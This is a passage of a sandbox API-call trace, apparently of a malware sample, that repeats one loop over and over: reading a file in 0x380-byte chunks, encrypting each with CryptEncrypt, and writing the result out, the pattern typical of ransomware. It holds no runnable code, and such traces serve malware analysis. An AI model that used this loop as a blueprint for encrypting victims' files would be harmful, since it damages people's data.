lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.923] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.923] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.923] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.923] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.923] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.923] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.923] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.923] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.923] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.923] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.923] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.924] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.924] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.924] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.924] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.924] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.924] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.924] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.924] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.925] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.925] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.925] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.925] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.925] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.925] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.925] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.925] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.925] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.925] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.925] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.925] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.925] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.926] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.926] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.926] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.926] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.926] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.926] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.926] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.926] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.927] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.927] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.927] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.928] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.928] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.928] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.928] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.928] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.928] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.928] WriteFile (in: hFile=0xffffffff, 